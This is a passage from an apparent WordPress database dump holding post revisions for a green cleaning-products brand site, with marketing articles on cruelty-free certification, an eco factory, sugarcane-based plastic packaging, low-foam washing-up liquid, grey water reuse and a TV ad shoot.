curls followed by eight triceps dips. End with a resistance exercise; raise the bottle out in front of you at a 90 degree angle and hold them there for as long as you possibly can - a great one for strengthening your arms (not to mention your determination!)\r\n\r\n&nbsp;\r\n<h3>Wiggle and stir</h3>\r\nWiggle your hips and have a spin when cooking up a storm in the kitchen - in the time it takes for you to whip up a delicious and healthy main course you\'ll have burned an additional 200 calories. And instead of sitting down while the veg is cooking why not practice your dance moves? You\'ll love it and your body will too!\r\n\r\n&nbsp;\r\n<h3>Wash and glow</h3>\r\nWork out while you wash up with some glute-firming rear leg lifts. Turn up the radio and, using the sink for balance, raise your leg behind you whilst holding your stomach in. Complete eight on the right leg before changing to the left leg, and repeat until your favourite song has finished.”','Cleanercise: You can workout whilst doing the housework!','','inherit','closed','closed','','34-revision-v1','','','2017-10-17 08:39:33','2017-10-17 08:39:33','',34,'http://www.dailyjolly.co.uk/34-revision-v1',0,'revision','',0),(71,1,'2017-10-17 08:40:22','2017-10-17 08:40:22','<h2 class=\"title\">A seal of approval for our love of furry things</h2>\r\nAnimals - we love them whether they\'re big, small, fluffy, furry, wriggly, cute or even a bit funny looking. That\'s why ever since Daily began, we\'ve always been against animal testing for the ingredients in our products.\r\n\r\nSadly, there aren\'t yet any bans on animal testing for cleaning products or their ingredients. A handful of countries have outlawed animal testing for cosmetics and personal products, but there\'s still a long way to go.\r\n\r\nOf course, we all need to know that our products are safe for our homes and families. Europe\'s REACH (Registration, Evaluation, Authorisation and Restriction of Chemicals) regulation helps with this by insisting that all chemicals are registered and assessed for safety, with animals used for testing only as a last resort. We believe that animals shouldn\'t be used at all: using non-animal tests and existing ingredients that have already been proved to be fine is the way to do it.\r\n<div class=\"highlight\">\r\n\r\nWe\'ve worked hard to gain the Leaping Bunny stamp... for the benefit of furry, funny creatures everywhere.\r\n\r\n</div>\r\n<h3>Making it official</h3>\r\nAfter lots of requests, we set out to make our cruelty free status official to reassure Daily lovers that no animals were harmed for the sake of the washing up and other chores. A huge part of the process was making sure we could work with the Cruelty Free International in their quest to get non-animal testing accepted and approved by the industry. Once that was all in place, we were then able to set our own cut-off date for ingredient testing. And here we are. In August this year, all our household and laundry products earned the Leaping Bunny stamp of approval. We\'re happy as rabbits.\r\n\r\nThe Leaping Bunny is the trusted mark of the only international no-animal-testing certification. It\'s managed by a network of animal protection organisations worldwide, including Cruelty Free International, who are all dedicated to ending the use of animals in product testing completely. Hooray.\r\n\r\nTo earn the Leaping Bunny mark, Daily needed to meet the strict criteria of the Humane Household Products Standard. This means that as well as not using animal testing for Daily, our ingredients must be animal test free too. We passed our audit with flying colours and are proud to be adding the lovely little stamp to all our household products. You\'ll see it sometime soon, if you haven\'t already.\r\n<h3>A happier future for bunnies everywhere</h3>\r\nWhen it comes to new ingredients, we\'re committed to using alternative tests that guarantee safety for you and your family without harming anything else. We\'ve worked hard to gain the Leaping Bunny stamp, and we\'ll continue to invest our time, energy and hard cash into the ongoing efforts for the benefit of furry, funny creatures everywhere.\r\n\r\nBoth Daily and the suppliers of our ingredients will continue to have regular checks and audits to make sure we\'re all sticking to the required standards. We\'re also busy working towards certification for all our personal care and commercial products. It\'s a big job but one we\'re more than happy to do.\r\n<h3>Have your say</h3>\r\nWe\'re really excited about joining the Leaping Bunny programme.','Cleaning products that are cruelty free!','Ecover have always been against animal testing for our ingredients, and now we are part of Cruelty Free International\'s official Leaping Bunny programme.','inherit','closed','closed','','35-revision-v1','','','2017-10-17 08:40:22','2017-10-17 08:40:22','',35,'http://www.dailyjolly.co.uk/35-revision-v1',0,'revision','',0),(72,1,'2017-10-17 08:41:03','2017-10-17 08:41:03','<h2 class=\"title\">Facts about many factories</h2>\r\nHere at Daily, the methods we use to make our ecologically friendly cleaning products are as green as the products themselves. From our factory roof to the energy we use to run it, we do our best to limit environmental impact.\r\n\r\nTake our energy supply, for starters. The Daily factory operates entirely on green electricity - the type produced by wind generators, tidal generators and other natural sources. We know how valuable energy is, so we try to make the most of it by choosing energy efficient lighting, for example, and then only using it when needed.\r\n\r\nAlthough the machinery we use is standard in the industry, we keep our energy and water consumption down by choosing low-speed appliances that can multi-task and don\'t require water to clean them. For example, the motors on our mixing machines can mix 25 tonnes of Daily liquid while consuming no more electricity than a few flat irons. And we have a squeezy gadget that\'s so efficient at getting every last drop of product out of the pipes, they don\'t need to be rinsed through.\r\n\r\nIt probably goes without saying that we hate waste, so we\'re big on recycling. We keep the amount of packaging used in our products to a minimum, and make sure whatever cardboard or plastic we do use can be recycled, re-used or re-filled. It\'s an ongoing process of improvement; in fact, we\'ve recently developed a new kind of green plastic we like to call <a href=\"../../articles/fantastic-plantastic/\">\'Plant-astic\'</a> that\'s 100% renewable, reusable and recyclable - and made from sugarcane. We\'re switching over to mass production very soon.\r\n\r\nBut it\'s the factory itself that we\'re most proud of. Cleverly designed to follow the movement of the sun from east to west, we work under the maximum amount of natural daylight - good for the power supply and good for the soul! The factory\'s frame is built from pine rather than more precious timbers and the walls are constructed using Poro+ bricks. Poro+ bricks are made from clay, wood pulp and coal fine. They require less energy to bake, yet they\'re light, porous and insulate well.\r\n\r\nAnd finally, we have our very own green, living roof. Covered in thick, spongy Sedum, or \'Thunder Beard\' as it\'s known, it\'s not just nice to look at; it also gives great insulation all year round. So effective is our Sedum roof that we don\'t need heating or air conditioning - the temperature never drops below 4В°C and never rises above 26В°C.\r\n\r\nYou see, we don\'t just love our factory because it\'s pretty. We\'ve been working for years to produce powerful, effective cleaning products that have minimal impact on the environment, and it\'s only right that the same rule should apply to our production methods. But rest assured, we don\'t expect you to save your bath water, live in a windmill or grow potatoes on your roof; just by choosing Daily, you\'re doing your bit, too.','Do you expect all factories to be ecological?','','inherit','closed','closed','','36-revision-v1','','','2017-10-17 08:41:03','2017-10-17 08:41:03','',36,'http://www.dailyjolly.co.uk/36-revision-v1',0,'revision','',0),(73,1,'2017-10-17 08:41:08','2017-10-17 08:41:08','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n    <link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/fantastic-plantastic\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section facts-about-ecover-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/fantastic-plantastic/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n														<h2 class=\"title\">Daily\'s new fantastic Plant-astic!</h2>\n														<p>\n                                                            At Daily, we\'ve always been ones to do things a little differently. And although we\'re anything but superficial, our latest breakthrough proves it\'s not just what\'s on the inside that counts...\n                                                        </p>\n                                                        <p>\n                                                            Like you, we recognise that plastic packaging is a major problem - not only does it clutter up your home, the plastic is made from crude oil. It\'s an increasingly scarce resource and we all know the problems associated with oil spills and pollution... So for three years now we\'ve been working to find a new, alternative packaging solution that starts to address some of these issues. We\'re very proud of the results.\n                                                        </p>\n                                                        <div class=\"highlight3\">\n                                                            <p><strong>The Message in our Bottle</strong><br/>Discover how our pledge is helping to clean up the planet one bottle at a time.<br/><a href=\"../../message-in-our-bottle/\">Find out how</a></p>\n                                                        </div>\n                                                        <p>\n                                                            By harnessing the power of nature and applying a little clever science, we\'ve implemented an innovative new PolyEthylene (PE) -  a green plastic we call Plant-astic that\'s 100% renewable, reusable and recyclable - and made from sugarcane! We\'re so pleased with it that we\'re making our bottles 100% Plant-astic. It\'s also good to see that some other well-known brands are now thinking of following our lead - even if they initially only intend using up to 30% renewable plastic.\n                                                        </p>\n                                                        <p>\n                                                            Manufacturing our new Plant-astic is unbelievably simple. Sugarcane is harvested to produce sugar, which is then fermented and distilled to produce ethanol. This ethanol is dehydrated to create ethylene, which is polymerized into Plant-astic. That\'s really all there is to it.\n                                                        </p>\n                                                        <p>\n                                                            Plant-astic is impressive in so many other ways. Because the sugarcane is grown and harvested in harmony with its natural environment, the nearby Amazonian rainforests remain unaffected. The entire production process is so efficient that we need only harvest 15 hectares of land to make a year\'s worth of Daily packaging.\n                                                        </p>\n                                                        <p>\n                                                            We\'re in the process of switching all of our packaging over, and as of April 2011, our bottles are being made from fantastic new Plant-astic. Of course, what\'s on the inside is just as important as ever, so you can be sure that every bit of new packaging contains cleaning products that are incredibly efficient and supremely powerful. \n                                                        </p>\n														\n													</div>\n												</div>\n                          </div>\n                        </div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n                <div id=\"inner-footer\">\n						</div>\n					</div>\n				</div>\n				\n			</div>\n		</div>\n  </div>\n    </form>\n</body>\n</html>','Fantastic Plant-astic','','inherit','closed','closed','','37-autosave-v1','','','2017-10-17 08:41:08','2017-10-17 08:41:08','',37,'http://www.dailyjolly.co.uk/37-autosave-v1',0,'revision','',0),(74,1,'2017-10-17 08:41:55','2017-10-17 08:41:55','<h2 class=\"title\">What\'s new in the plant world?</h2>\r\nAt Daily, we\'ve always been ones to do things a little differently. And although we\'re anything but superficial, our latest breakthrough proves it\'s not just what\'s on the inside that counts...\r\n\r\nLike you, we recognise that plastic packaging is a major problem - not only does it clutter up your home, the plastic is made from crude oil. It\'s an increasingly scarce resource and we all know the problems associated with oil spills and pollution... So for three years now we\'ve been working to find a new, alternative packaging solution that starts to address some of these issues. We\'re very proud of the results.\r\n<div class=\"highlight3\">\r\n\r\n<strong>The Message in our Bottle</strong>\r\nDiscover how our pledge is helping to clean up the planet one bottle at a time.\r\n<a href=\"../../message-in-our-bottle/\">Find out how</a>\r\n\r\n</div>\r\nBy harnessing the power of nature and applying a little clever science, we\'ve implemented an innovative new PolyEthylene (PE) - a green plastic we call Plant-astic that\'s 100% renewable, reusable and recyclable - and made from sugarcane! We\'re so pleased with it that we\'re making our bottles 100% Plant-astic. It\'s also good to see that some other well-known brands are now thinking of following our lead - even if they initially only intend using up to 30% renewable plastic.\r\n\r\nManufacturing our new Plant-astic is unbelievably simple. Sugarcane is harvested to produce sugar, which is then fermented and distilled to produce ethanol. This ethanol is dehydrated to create ethylene, which is polymerized into Plant-astic. That\'s really all there is to it.\r\n\r\nPlant-astic is impressive in so many other ways. Because the sugarcane is grown and harvested in harmony with its natural environment, the nearby Amazonian rainforests remain unaffected. The entire production process is so efficient that we need only harvest 15 hectares of land to make a year\'s worth of Daily packaging.\r\n\r\nWe\'re in the process of switching all of our packaging over, and as of April 2011, our bottles are being made from fantastic new Plant-astic. Of course, what\'s on the inside is just as important as ever, so you can be sure that every bit of new packaging contains cleaning products that are incredibly efficient and supremely powerful.','What\'s new in the plant world?','','inherit','closed','closed','','37-revision-v1','','','2017-10-17 08:41:55','2017-10-17 08:41:55','',37,'http://www.dailyjolly.co.uk/37-revision-v1',0,'revision','',0),(75,1,'2017-10-17 08:42:42','2017-10-17 08:42:42','<h2 class=\"title\">Are you going to a festival in the summer of 2018? Read our tips today!</h2>\r\nIf you\'re lucky enough to be heading to one of this year\'s fabulous festivals, we\'ve got some great hints and tips for the practical side of things. The fun part of it is up to you!\r\n<ol>\r\n 	<li><strong>Pack for the arrival trudge</strong> - there are some obvious must-haves like a tent, sleeping bag, clothes, good shoes, earplugs etc. But keeping it streamlined will make lugging your gear that bit easier. If you forget something, you can probably buy it there. And valuables? If you don’t want to lose it, leave it at home.</li>\r\n 	<li><strong>Remember where you parked</strong> - write it, share it, repeat it, chant it, do whatever you can to remember it! Searching for your motor in amongst 50,000 others can take a long, long time.</li>\r\n 	<li><strong>TAKE. YOUR. WELLIES.</strong> - the forecast may be glorious but that hot, steamy day can turn into a thundery, wet night. Wellies are worth their weight in gold when the rain hits. At least make sure they’re in the car, even if you don’t carry them all the way in.</li>\r\n 	<li><strong>Camp wisely</strong> - first, find a good spot. Not at the bottom of a hill (muddy ditch alert) and not next to the loos, unless you really don’t mind festival smells and doors banging all night long. Once you’ve pitched your tent, look for a big, obvious landmark so that you can always find your way back.</li>\r\n 	<li><strong>Always carry a torch</strong> - your little morning walk could turn into an all day adventure. Keep a torch in your bag so that you’ve always got a way to shine your path back to base.</li>\r\n 	<li><strong>Pick up your litter</strong> - once the fun’s over, festival sites are strewn with all kinds of rubbish that can harm animals, big and small. For a cleaner festival and a sparkly clear conscience, pick it all up and put it in the bin.</li>\r\n 	<li><strong>Have a plan to stay safe</strong> - festivals are big and busy. Try to get your bearings, carry a map and have a meeting point set up in case anyone gets lost. If you have kiddos in your group, a wristband with your details on it can be great peace of mind.</li>\r\n 	<li><strong>Find your shower power</strong> - most festivals have great facilities, often with long queues. Pick a time when everyone else is asleep or busy watching the biggest bands and you might just walk right in. Our <a href=\"http://www.ecoverdirect.com/tags/mizu.aspx?tag=Mizu\" target=\"_blank\" rel=\"noopener\">Mizu body care range</a> is a great choice for feeling fresh again.</li>\r\n 	<li><strong>Go with the flow</strong> - with so many bands and acts to see, it’s easy to end up racing all over the place. Our festival pros recommend choosing one or two must-sees for the day, and letting the festival vibe carry you the rest of the way.</li>\r\n 	<li><strong>Try something new</strong> - Lebanese food, reflexology, hat making, laughter workshops, festivals are the place to experience all things weird, wild and wonderful. You never know, you might find your new passion in life!</li>\r\n</ol>','Are you going to a festival in the summer of 2018? Read our tips today!','Ecover\'s summer festival hints and tips - our survival guide for a summer of fun.','inherit','closed','closed','','38-revision-v1','','','2017-10-17 08:42:42','2017-10-17 08:42:42','',38,'http://www.dailyjolly.co.uk/38-revision-v1',0,'revision','',0),(76,1,'2017-10-17 08:42:48','2017-10-17 08:42:48','<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\">\n<head>\n	\n	<meta name=\"description\" content=\"Too many bubbles when washing up the dishes is not necessarily a good thing. Find out more about foam boosters and their role in your washing up bowl.\"/>\n	<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\n    <link rel=\"canonical\" href=\"http://www.the-splash.co.uk/articles/foam-boosters\">\n		<link media=\"screen\" rel=\"stylesheet\" href=\"../../css/all.css\" type=\"text/css\"/>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"../../css/print.css\" media=\"print\"/>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../css/fancybox.css\" type=\"text/css\"/>\n	<!--<script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js\"></script>-->\n    <script type=\"text/javascript\" src=\"../../ajax/libs/jquery/1.9.1/jquery.min.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/jquery.browser.js\"></script>\n    <script type=\"text/javascript\" src=\"../../js/all.js\"></script>\n	<!--<script type=\"text/javascript\" src=\"/js/jquery.moodular.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.controls.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.moodular.effects.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery-ui-1.8.14.custom.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tools.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.tooltip.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.imagesloaded.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.masonry.min.js\"></script>\n	<script type=\"text/javascript\" src=\"/js/jquery.inputlimiter.1.2.2.min.js\"></script>\n    <script type=\"text/javascript\" src=\"/js/jquery.vticker.1.4.js\"></script>-->\n	<script type=\"text/javascript\" src=\"../../js/jquery.main.js\"></script>\n	<link media=\"all\" rel=\"stylesheet\" href=\"../../js/jquery.tooltip.css\" type=\"text/css\"/>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.mousewheel-3.0.4.pack.js\"></script>\n	<script type=\"text/javascript\" src=\"../../js/fancybox/jquery.fancybox-1.3.4.pack.js\"></script>\n	<link rel=\"stylesheet\" type=\"text/css\" href=\"../../js/fancybox/jquery.fancybox-1.3.4.css\" media=\"screen\"/>\n	<!--[if lt IE 7]>\n		\n		\n	<![endif]-->\n	<!--[if lt IE 8]><link rel=\"stylesheet\" type=\"text/css\" href=\"/css/ie.css\" media=\"screen\"><![endif]-->\n   \n  var _gaq = _gaq || [];\n  _gaq.push([\'_setAccount\', \'UA-22968591-1\']);\n  _gaq.push([\'_trackPageview\']);\n  (function() {\n    var ga = document.createElement(\'script\'); ga.type = \'text/javascript\'; ga.async = true;\n    ga.src = (\'https:\' == document.location.protocol ? \'https://ssl/\' : \'http://www/\') + \'.google-analytics.com/ga.js\';\n    var s = document.getElementsByTagName(\'script\')[0]; s.parentNode.insertBefore(ga, s);\n  })();\n</script><title>\n</title></head>\n<body id=\"ctl00_body1\" class=\"articles-section cleaning-with-care-subsection\">\n    <form name=\"aspnetForm\" method=\"post\" action=\"../../articles/foam-boosters/\" id=\"aspnetForm\">\n      <div class=\"body\">\n        <div class=\"wrapper\">\n          <div class=\"w1\">\n            <div class=\"w2\">\n              <div class=\"w3\">\n                <div id=\"main\">\n                  <div class=\"box\">\n                    <div class=\"c\">\n                      <div class=\"content\">\n                        \n                        <div id=\"twocolumns\">\n                          <div id=\"content\">\n												<div class=\"twocols\">\n													<div class=\"content\">\n													  <h2 class=\"title\">The truth about bubbles and washing up</h2>\n                                                        <p>\n                                                            Many of us see bubbles and think \'clean\'; we believe the bubblier the better, that foamier equals effectiveness and super-suds mean super-clean dishes.\n                                                        </p>\n                                                        <p>\n                                                            But it ain\'t necessarily so. There\'s an awful lot of froth surrounding the bubbliness of washing up liquids... why not find out more...?\n                                                        </p>\n                                                        <h3>\n                                                            The facts about washing up liquids                                                        \n                                                        </h3>\n                                                        <p>\n                                                            So how does a washing up liquid work? It\'s all down to surfactants; they\'re the basic ingredients that get the job done. Some are better at cleaning than foaming, while others are better at foaming than cleaning. More often than not, when you see really <i>bubbly</i> bubbles it\'s because the manufacturer has chosen to add less effective but foamier surfactants to make you think it\'s doing a better job.\n                                                        </p>\n                                                        <p>\n                                                            But don\'t be fooled; whilst it\'s true that in times past extra suds reassured consumers that the products they were buying packed cleaning punch, times have changed. We no longer need the amount of froth to summon up a streak-free sparkle. Clever science has given us surfactants that clean more effectively than ever, without producing mountains of foam. \n                                                        </p>\n                                                        <p>\n                                                            It\'s a bit like baking a cake; if the recipe called for plain flour, you wouldn\'t bother adding self-raising. Bubbles are simply a superficial side effect. What they signify is wasted product.\n                                                        </p>\n                                                        <h3>\n                                                            An important question of source\n                                                        </h3>\n                                                        <p>\n                                                            At Daily, we adopt a strict \'no nasties\' policy.  The surfactants we put in our products come from natural, plant-based sources, rather than petrochemical (oil) sources. Ensuring renewability and supporting our sustainability ethos. \n                                                        </p>\n                                                        <p>\n                                                            Our plant-based surfactants concentrate on cleaning instead of working themselves up into a pointless lather. \n                                                        </p>\n                                                        <h3>\n                                                            Say no to superficial suds\n                                                        </h3>\n                                                        <p>\n                                                            It\'s time to dispel the myth of \'the bubblier, the better\'. Now you know, tell your friends; there\'s no need for extra bubbling surfactants, especially those made from petrochemicals. One squirt of Daily is as effective at <a onclick=\"return t(\'offsite\', this.href);\" href=\"http://www.ecoverdirect.com/departments/sparkling-dishes.aspx?deptid=SD\" target=\"_blank\">cleaning a sink full of cups</a> and crockery as the rest, but with less bubbles.\n                                                        </p>\n                                                        <p>\n                                                            Daily <i>shouldn\'t</i> bubble, froth or foam too much. It\'s just not in our nature.\n                                                        </p>\n                                                        <p>\n                                                            We believe these latest, lower-foam formulas are our most effective yet, but we\'re always looking for ways to make our products even better. As ever, you\'ll be the first to know about our next big breakthrough.\n                                                        </p>\n														\n													</div>\n												</div>\n                          </div>\n                        </div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n                <div id=\"inner-footer\">\n						</div>\n					</div>\n				</div>\n				\n			</div>\n		</div>\n  </div>\n    </form>\n</body>\n</html>','Why we don\'t use Foam Boosters','Too many bubbles when washing up the dishes is not necessarily a good thing. Find out more about foam boosters and their role in your washing up bowl.','inherit','closed','closed','','39-autosave-v1','','','2017-10-17 08:42:48','2017-10-17 08:42:48','',39,'http://www.dailyjolly.co.uk/39-autosave-v1',0,'revision','',0),(77,1,'2017-10-17 08:43:16','2017-10-17 08:43:16','<h2 class=\"title\">The truth about bubbles and washing up</h2>\r\nMany of us see bubbles and think \'clean\'; we believe the bubblier the better, that foamier equals effectiveness and super-suds mean super-clean dishes.\r\n\r\nBut it ain\'t necessarily so. There\'s an awful lot of froth surrounding the bubbliness of washing up liquids... why not find out more...?\r\n<h3>The facts about washing up liquids</h3>\r\nSo how does a washing up liquid work? It\'s all down to surfactants; they\'re the basic ingredients that get the job done. Some are better at cleaning than foaming, while others are better at foaming than cleaning. More often than not, when you see really <i>bubbly</i> bubbles it\'s because the manufacturer has chosen to add less effective but foamier surfactants to make you think it\'s doing a better job.\r\n\r\nBut don\'t be fooled; whilst it\'s true that in times past extra suds reassured consumers that the products they were buying packed cleaning punch, times have changed. We no longer need the amount of froth to summon up a streak-free sparkle. Clever science has given us surfactants that clean more effectively than ever, without producing mountains of foam.\r\n\r\nIt\'s a bit like baking a cake; if the recipe called for plain flour, you wouldn\'t bother adding self-raising. Bubbles are simply a superficial side effect. What they signify is wasted product.\r\n<h3>An important question of source</h3>\r\nAt Daily, we adopt a strict \'no nasties\' policy. The surfactants we put in our products come from natural, plant-based sources, rather than petrochemical (oil) sources. Ensuring renewability and supporting our sustainability ethos.\r\n\r\nOur plant-based surfactants concentrate on cleaning instead of working themselves up into a pointless lather.\r\n<h3>Say no to superficial suds</h3>\r\nIt\'s time to dispel the myth of \'the bubblier, the better\'. Now you know, tell your friends; there\'s no need for extra bubbling surfactants, especially those made from petrochemicals. One squirt of Daily is as effective at <a href=\"http://www.ecoverdirect.com/departments/sparkling-dishes.aspx?deptid=SD\" target=\"_blank\" rel=\"noopener\">cleaning a sink full of cups</a> and crockery as the rest, but with less bubbles.\r\n\r\nDaily <i>shouldn\'t</i> bubble, froth or foam too much. It\'s just not in our nature.\r\n\r\nWe believe these latest, lower-foam formulas are our most effective yet, but we\'re always looking for ways to make our products even better. As ever, you\'ll be the first to know about our next big breakthrough.','What are foam boosters and why don\'t we recommend them?','Too many bubbles when washing up the dishes is not necessarily a good thing. Find out more about foam boosters and their role in your washing up bowl.','inherit','closed','closed','','39-revision-v1','','','2017-10-17 08:43:16','2017-10-17 08:43:16','',39,'http://www.dailyjolly.co.uk/39-revision-v1',0,'revision','',0),(78,1,'2017-10-17 08:44:03','2017-10-17 08:44:03','<h1 class=\"title-new\">Grey Water</h1>\r\n<h3>No Need to Pull the Plug!</h3>\r\n<strong>Did you know used Daily washing up water - or \'grey water\' - can be put to great use once the dishes are sparkling clean?</strong>\r\n\r\nYes, that\'s right- you can water your prized sunflowers, or your latest crop of fruit and veg- or simply keep the lawn looking lovely with your grey water.\r\n\r\nOur <a href=\"../../products/washing-up/washing-up-liquids/\">Washing up Liquids</a> contain No Nasties such as phosphates and we\'ve developed our very own eco-surfactants for powerful and effective cleaning- which means the grey water from our products won\'t have a negative effect on your greenery.\r\n\r\nIt\'s advisable to let the water settle for no more than a few days first so the plant and mineral based ingredients can start to biodegrade. In hot temperatures it only needs to settle for a day- but after that water away!\r\n\r\nWe are passionate about creating a closed loop in sustainability and making sure the impact our products have on the environment is as minimal as possible, from the <a href=\"../../articles/factory-facts/\">Daily Ecological factory</a>, to your family home - and beyond.\r\n<div class=\"clear\"></div>\r\n<p class=\"em2\">Feel Good in the knowledge that you can recycle your grey water back in to nature and keep your <a href=\"../../feel-good/ecover-garden/\">garden</a> looking healthy and clean - just like the dishes.</p>\r\n<p class=\"em1\">Why not try our washing-up liquid</p>\r\n<p class=\"em2\"><a href=\"http://www.ecoverdirect.com/products/washing-up-liquid-500ml/ewash500ml.aspx?productid=ewash500ml\" target=\"_blank\" rel=\"noopener\">4 fresh fragrances to choose from &gt;</a></p>','What is grey water and why can you use it?','Used Ecover washing up water, can be put to use once the dishes are sparkling clean? Water your prized sunflowers, or your latest crop of fruit and veg.','inherit','closed','closed','','43-revision-v1','','','2017-10-17 08:44:03','2017-10-17 08:44:03','',43,'http://www.dailyjolly.co.uk/43-revision-v1',0,'revision','',0),(79,1,'2017-10-17 08:45:00','2017-10-17 08:45:00','<h2 class=\"title\">Green Production Values - Q &amp; A</h2>\r\n<strong>Why make a TV ad?</strong>\r\n\r\nLots of people tell us that they have heard of Daily, but don\'t know what is different about it. By advertising on TV we can share our messages with a new mix of people who may not have thought about buying our products before.\r\n\r\nAt the moment 1.2 million households use Daily, but we want more! The more people try Daily, the more we help the environment and reduce chemicals in homes.\r\n\r\n<strong>Where else can we see Daily?</strong>\r\n\r\nNot everyone watches TV so we\'re promoting Daily in a number of ways different ways; magazine ads, in-store communications, online, social media, and at key events throughout the UK.\r\n\r\n<strong>Where was the new Daily Feel Good Cleaning ad filmed?</strong>\r\n\r\nWe filmed in Cape Town, South Africa (lucky us!) for a number of reasons.\r\n\r\nThe Cape Town area has lots of locations that look and feel like the UK. We found local actors to star in our ad and there were some fantastic production companies that matched our sustainable values nearby. We filmed in November, so perhaps the most important reason for the choice was that we were guaranteed 14 hours of natural light per day. These longer, lighter days meant we could do a lot more filming over a shorter number of days thus reducing our environmental impact (as well as reducing our costs). Had we filmed in the UK filming would have taken weeks rather than days!\r\n\r\n<strong>Doesn\'t travelling to South Africa damage the environment?</strong>\r\n\r\nAlthough South Africa does seem like a long way to go, we did everything possible to ensure we had minimum impact on the environment:\r\n<ul>\r\n 	<li>We used Cape Town based production teams and actors, so only 7 out of 80+ people involved with the shoot had to fly from the UK; 95% of the crew were local.</li>\r\n 	<li>The production company we hired had strong eco credentials; they have their own recycling trailers and bins, and as with all their shoots endeavoured to have as little impact as possible in every location. All waste was recycled, food waste was composted to feed the garden at the production company offices, and even the loos were solar powered!</li>\r\n 	<li>The caterers we used grow as much food as they can on their own land, watered with rain water and powered by the sun. Plus, they plant a tree for every five jobs they create.</li>\r\n 	<li>Any leftover props and clothing used in the shoot were donated to the Ubunye Educare Centre, which works with disadvantaged children in the Cape Town area to develop their social and learning skills before school age.</li>\r\n 	<li>We neutralised the carbon created through both the flights that we took and the shoot itself by contributing to two projects run by our friends at ClimateCare. The first project aims to reduce emissions and provide over four million people in rural Kenya with clean, safe drinking water. The second helps fund a forest protection project near Mombasa that empowers the local communities to be economically independent without the need to cut down the natural forest.</li>\r\n 	<li>We stayed in a lovely family-run eco hotel that has won a number of responsible tourism awards for its approach to the environment and social development. They take conservation seriously, instill a philosophy of sustainability, and save water and energy wherever they can.</li>\r\n 	